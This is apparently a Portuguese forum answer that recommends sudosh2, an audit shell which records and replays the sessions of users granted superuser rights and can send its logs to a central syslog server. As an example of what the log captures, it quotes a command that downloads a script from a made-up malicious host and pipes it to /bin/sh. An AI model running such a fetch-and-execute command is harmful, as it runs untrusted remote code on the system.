Confie mas verifique!
Confira sudosh2 . O sudosh2 é fornecido pelas portas do FreeBSD. Pacotes estão disponíveis para RedHat e Ubuntu. Aqui está a descrição do site:
sudosh é um filtro de shell de auditoria e pode ser usado como um shell de login. O Sudosh registra todas as teclas e saídas e pode reproduzir a sessão como um videocassete.
O Sudosh permitirá que você reproduza a sessão do usuário, o que permitirá ver todas as entradas e saídas conforme o usuário a viu. Você vê tudo, pressionamentos de teclas, erros de digitação, backspaces, o que eles editaram vi
, a saída de wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh
etc.
É possível enviar logs do sudosh para o syslog, para que eles possam ser armazenados em um servidor syslog central, longe do sistema.
Observe que sudosh2 é um substituto para o sudosh, que foi abandonado por seu autor
Você trabalha em uma instituição acadêmica onde os usuários insistem em ter privilégios de superusuário? Ou você trabalha em uma empresa e deseja permitir que os usuários tenham privilégios de superusuário em suas próprias VMs? Esta pode ser a solução para você.